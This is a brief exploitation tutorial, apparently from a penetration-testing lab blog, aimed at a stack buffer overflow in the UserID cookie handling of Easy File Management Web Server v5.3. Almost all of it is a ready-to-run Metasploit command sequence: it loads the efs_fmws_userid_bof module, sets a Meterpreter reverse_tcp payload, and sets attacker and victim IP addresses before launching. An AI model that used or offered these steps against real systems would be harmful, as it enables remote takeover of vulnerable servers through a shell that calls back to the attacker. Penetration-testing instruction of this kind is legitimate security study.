Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code.
Exploit Targets
Easy File Management Web Server v5.3
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/windows/http/efs_fmws_userid_bof
msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)
msf exploit (efs_fmws_userid_bof)>exploit
